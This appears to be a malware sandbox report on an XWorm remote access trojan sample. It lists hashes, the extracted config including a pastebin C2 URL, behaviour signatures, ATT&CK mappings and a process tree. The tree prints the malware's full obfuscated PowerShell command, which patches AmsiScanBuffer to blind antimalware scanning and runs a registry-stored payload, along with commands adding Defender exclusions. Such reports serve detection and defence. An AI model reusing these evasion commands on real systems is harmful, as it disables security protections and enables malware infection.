Overview

overview

10

Static

static

1

Iinpdftw.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    60s
  • max time network
    60s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    15-06-2024 05:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Iinpdftw.exe

  • Size

    4.7MB

  • MD5

    a9cb0e951c7ede7c23b5ba350b4920fd

  • SHA1

    a16b2377a77e86b2a2cd27d58c44218e8aaa1a66

  • SHA256

    0b75189b6f3d6e031159d20e351d60f6dd8956642e16d55083936096f73eb864

  • SHA512

    300111595b2ea4fc3143b25faca8f97e27286221456c792f5ea80b3fe066baf5d1d2fcca122ebe17362ea3f26fdb06388356be122389229745972bb6d0b6fad4

  • SSDEEP

    24576:VwtcEr/TQ/8YlE33S3++12pt/R31ggXSe1dFwUMWo8zrC9b84opK76iV7+rt9V23:rz

Score
10/10
xwormexecutionrattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

Mc35OpRlVfHYgK3s

Attributes
  • install_file

    USB.exe

  • pastebin_url

    https://pastebin.com/raw/EiiXCJbn

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:636
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:484
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{5eec782a-f8f0-4ad9-b2e7-233dfe61a98c}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4020
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:692
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:1000
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:540
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:756
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1052
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  1⤵
                    PID:1060
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1176
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:GbJMDRrjyuFc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$XBkbtFofyxzNOr,[Parameter(Position=1)][Type]$tWftyZHqGw)$ruVkoAIOMeM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+''+[Char](108)+'e'+'c'+'t'+[Char](101)+''+'d'+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+''+'e'+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+'t'+''+'e'+'T'+'y'+''+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+'s'+[Char](44)+''+[Char](80)+'u'+'b'+'l'+'i'+''+'c'+',S'+[Char](101)+''+'a'+'le'+[Char](100)+''+[Char](44)+''+'A'+''+'n'+'siC'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+'A'+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$ruVkoAIOMeM.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+'a'+''+'l'+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'eB'+'y'+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$XBkbtFofyxzNOr).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+'n'+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$ruVkoAIOMeM.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+'H'+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+','+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$tWftyZHqGw,$XBkbtFofyxzNOr).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'im'+[Char](101)+''+[Char](44)+''+'M'+'a'+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $ruVkoAIOMeM.CreateType();}$lMAvErwPyCAKQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+'d'+[Char](108)+''+'l'+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+'2'+[Char](46)+''+'U'+''+'n'+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+'Me'+[Char](116)+''+[Char](104)+''+'o'+'d'+[Char](115)+'');$KIlnvZNKHUUufP=$lMAvErwPyCAKQ.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+'oc'+[Char](65)+'d'+'d'+''+'r'+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags]('Pu'+'b'+''+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$FxYIxNXGCNtlacKygpy=GbJMDRrjyuFc @([String])([IntPtr]);$jSNzfMHIUzuovPzemMisQa=GbJMDRrjyuFc @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$awrKPPHUiPm=$lMAvErwPyCAKQ.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+'eH'+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object]('ke'+[Char](114)+'n'+[Char](101)+''+'l'+'3'+[Char](50)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')));$YdkcXPVLIuhnjM=$KIlnvZNKHUUufP.Invoke($Null,@([Object]$awrKPPHUiPm,[Object](''+'L'+'oa'+'d'+''+'L'+'ib'+[Char](114)+''+[Char](97)+''+'r'+'y'+'A'+'')));$LEbKeLlEQzHrwDnOZ=$KIlnvZNKHUUufP.Invoke($Null,@([Object]$awrKPPHUiPm,[Object]('V'+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+'a'+'l'+''+'P'+''+'r'+'ote'+[Char](99)+''+[Char](116)+'')));$NkbOJSD=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YdkcXPVLIuhnjM,$FxYIxNXGCNtlacKygpy).Invoke('ams'+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$UYtmAyLBBKaSOGIGo=$KIlnvZNKHUUufP.Invoke($Null,@([Object]$NkbOJSD,[Object](''+[Char](65)+''+'m'+'si'+'S'+''+'c'+''+'a'+''+[Char](110)+''+[Char](66)+''+'u'+''+'f'+'fe'+[Char](114)+'')));$aRNyktcPCI=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LEbKeLlEQzHrwDnOZ,$jSNzfMHIUzuovPzemMisQa).Invoke($UYtmAyLBBKaSOGIGo,[uint32]8,4,[ref]$aRNyktcPCI);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$UYtmAyLBBKaSOGIGo,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LEbKeLlEQzHrwDnOZ,$jSNzfMHIUzuovPzemMisQa).Invoke($UYtmAyLBBKaSOGIGo,[uint32]8,0x20,[ref]$aRNyktcPCI);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue('$'+[Char](55)+'7'+'s'+''+[Char](116)+''+'a'+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:2916
                      • C:\Windows\System32\Conhost.exe
                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        3⤵
                          PID:2260
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                      1⤵
                        PID:1196
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1264
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                          1⤵
                            PID:1272
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                              PID:1376
                              • C:\Windows\system32\sihost.exe
                                sihost.exe
                                2⤵
                                  PID:2780
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                1⤵
                                  PID:1384
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                  1⤵
                                  • Drops file in System32 directory
                                  PID:1436
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1548
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1564
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k NetworkService -p
                                      1⤵
                                        PID:1672
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1684
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1744
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                            1⤵
                                              PID:1820
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1876
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1964
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1972
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:1728
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                      1⤵
                                                        PID:1788
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:2088
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2232
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k NetworkService -p
                                                            1⤵
                                                              PID:2408
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2420
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2432
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2464
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2544
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2564
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2580
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                          1⤵
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2600
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2608
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                            1⤵
                                                                              PID:1044
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:792
                                                                              • C:\Windows\Explorer.EXE
                                                                                C:\Windows\Explorer.EXE
                                                                                1⤵
                                                                                  PID:3316
                                                                                  • C:\Users\Admin\AppData\Local\Temp\Iinpdftw.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\Iinpdftw.exe"
                                                                                    2⤵
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4792
                                                                                    • C:\Users\Admin\AppData\Local\Temp\$77e1f23e
                                                                                      "C:\Users\Admin\AppData\Local\Temp\$77e1f23e"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2752
                                                                                    • C:\Users\Admin\AppData\Local\Temp\$77f99bf3
                                                                                      "C:\Users\Admin\AppData\Local\Temp\$77f99bf3"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:5072
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\$77f99bf3'
                                                                                        4⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        PID:652
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          5⤵
                                                                                            PID:1172
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77f99bf3'
                                                                                          4⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          PID:4500
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            5⤵
                                                                                              PID:968
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                      1⤵
                                                                                        PID:3444
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                        1⤵
                                                                                          PID:3476
                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                          1⤵
                                                                                            PID:3824
                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                            1⤵
                                                                                              PID:3952
                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                              1⤵
                                                                                                PID:3976
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                                1⤵
                                                                                                  PID:4024
                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                  1⤵
                                                                                                    PID:4200
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                                    1⤵
                                                                                                      PID:4416
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                      1⤵
                                                                                                        PID:3576
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                        1⤵
                                                                                                          PID:1192
                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                          1⤵
                                                                                                            PID:2492
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                            1⤵
                                                                                                              PID:3936
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                              1⤵
                                                                                                                PID:1524
                                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                1⤵
                                                                                                                  PID:400
                                                                                                                • C:\Windows\system32\SppExtComObj.exe
                                                                                                                  C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:4812
                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                    1⤵
                                                                                                                      PID:1588
                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                      1⤵
                                                                                                                        PID:4760
                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:1996
                                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                          1⤵
                                                                                                                          • Enumerates system info in registry
                                                                                                                          PID:5024

                                                                                                                        Network

                                                                                                                        MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                        Initial Access

                                                                                                                        Execution

                                                                                                                        Command and Scripting Interpreter

                                                                                                                        1
                                                                                                                        T1059

                                                                                                                        PowerShell

                                                                                                                        1
                                                                                                                        T1059.001

                                                                                                                        Persistence

                                                                                                                        Privilege Escalation

                                                                                                                        Defense Evasion

                                                                                                                        Credential Access

                                                                                                                        Discovery

                                                                                                                        System Information Discovery

                                                                                                                        2
                                                                                                                        T1082

                                                                                                                        Query Registry

                                                                                                                        2
                                                                                                                        T1012

                                                                                                                        Lateral Movement

                                                                                                                        Collection

                                                                                                                        Exfiltration

                                                                                                                        Command and Control

                                                                                                                        Web Service

                                                                                                                        1
                                                                                                                        T1102

                                                                                                                        Impact

                                                                                                                        Resource Development

                                                                                                                        Reconnaissance

                                                                                                                        Replay Monitor

                                                                                                                        Loading Replay Monitor...

                                                                                                                        Downloads

                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                                                                                          Filesize

                                                                                                                          2KB

                                                                                                                          MD5

                                                                                                                          ac4917a885cf6050b1a483e4bc4d2ea5

                                                                                                                          SHA1

                                                                                                                          b1c0a9f27bd21c6bbb8e9be70db8777b4a2a640f

                                                                                                                          SHA256

                                                                                                                          e39062a62c3c7617feeeff95ea8a0be51104a0d36f46e44eea22556fda74d8d9

                                                                                                                          SHA512

                                                                                                                          092c67a3ecae1d187cad72a8ea1ea37cb78a0cf79c2cd7fb88953e5990669a2e871267015762fd46d274badb88ac0c1d73b00f1df7394d89bed48a3a45c2ba3d

                                                                                                                          Download Submit
                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                          Filesize

                                                                                                                          18KB

                                                                                                                          MD5

                                                                                                                          d9a87334a1d8ba2357dcd483f46619d6

                                                                                                                          SHA1

                                                                                                                          ddedc337ae9948626e725c6ea6c2e1f37e770442

                                                                                                                          SHA256

                                                                                                                          0afd2c42ab9b82150495423c6b72322d60a2f506fa0bb814f7e8a57bbd5a4f4c

                                                                                                                          SHA512

                                                                                                                          cfad686e601926235d64d9188bcf1468ce1500f909c7132580f958e16eaf3615adcc6f12e97520c5735f8a994a7e08c06204898b0da414fafb557065f44af42c

                                                                                                                          Download Submit
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\$77e1f23e
                                                                                                                          Filesize

                                                                                                                          4.7MB

                                                                                                                          MD5

                                                                                                                          a9cb0e951c7ede7c23b5ba350b4920fd

                                                                                                                          SHA1

                                                                                                                          a16b2377a77e86b2a2cd27d58c44218e8aaa1a66

                                                                                                                          SHA256

                                                                                                                          0b75189b6f3d6e031159d20e351d60f6dd8956642e16d55083936096f73eb864

                                                                                                                          SHA512

                                                                                                                          300111595b2ea4fc3143b25faca8f97e27286221456c792f5ea80b3fe066baf5d1d2fcca122ebe17362ea3f26fdb06388356be122389229745972bb6d0b6fad4

                                                                                                                          Download Submit
                                                                                                                        • C:\Windows\Temp\__PSScriptPolicyTest_x2b2wwkr.dao.ps1
                                                                                                                          Filesize

                                                                                                                          60B

                                                                                                                          MD5

                                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                          SHA1

                                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                          SHA256

                                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                          SHA512

                                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                          Download Submit
                                                                                                                        • memory/652-5671-0x0000000070010000-0x000000007005C000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          304KB

                                                                                                                          Download
                                                                                                                        • memory/652-5668-0x00000000066E0000-0x00000000066FE000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          120KB

                                                                                                                          Download
                                                                                                                        • memory/652-5689-0x0000000008240000-0x000000000825A000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          104KB

                                                                                                                          Download
                                                                                                                        • memory/652-5688-0x0000000008130000-0x0000000008145000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          84KB

                                                                                                                          Download
                                                                                                                        • memory/652-5687-0x0000000008120000-0x000000000812E000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          56KB

                                                                                                                          Download
                                                                                                                        • memory/652-5686-0x00000000080F0000-0x0000000008101000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          68KB

                                                                                                                          Download
                                                                                                                        • memory/652-5685-0x0000000008180000-0x0000000008216000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          600KB

                                                                                                                          Download
                                                                                                                        • memory/652-5684-0x0000000007F50000-0x0000000007F5A000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          40KB

                                                                                                                          Download
                                                                                                                        • memory/652-5683-0x0000000007EE0000-0x0000000007EFA000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          104KB

                                                                                                                          Download
                                                                                                                        • memory/652-5682-0x0000000008530000-0x0000000008BAA000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          6.5MB

                                                                                                                          Download
                                                                                                                        • memory/652-5681-0x0000000007920000-0x00000000079C4000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          656KB

                                                                                                                          Download
                                                                                                                        • memory/652-5680-0x0000000007900000-0x000000000791E000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          120KB

                                                                                                                          Download
                                                                                                                        • memory/652-5655-0x0000000001340000-0x0000000001376000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          216KB

                                                                                                                          Download
                                                                                                                        • memory/652-5670-0x00000000076C0000-0x00000000076F4000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          208KB

                                                                                                                          Download
                                                                                                                        • memory/652-5669-0x00000000069D0000-0x0000000006A1C000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          304KB

                                                                                                                          Download
                                                                                                                        • memory/652-5690-0x0000000008220000-0x0000000008228000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                          Download
                                                                                                                        • memory/652-5667-0x00000000062D0000-0x0000000006627000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          3.3MB

                                                                                                                          Download
                                                                                                                        • memory/652-5658-0x00000000059D0000-0x0000000005A36000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          408KB

                                                                                                                          Download
                                                                                                                        • memory/652-5657-0x0000000005930000-0x0000000005952000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          136KB

                                                                                                                          Download
                                                                                                                        • memory/652-5656-0x0000000005CA0000-0x00000000062CA000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          6.2MB

                                                                                                                          Download
                                                                                                                        • memory/2752-4902-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                          Download
                                                                                                                        • memory/2916-5154-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                          Download
                                                                                                                        • memory/2916-4919-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                          Download
                                                                                                                        • memory/2916-4918-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp
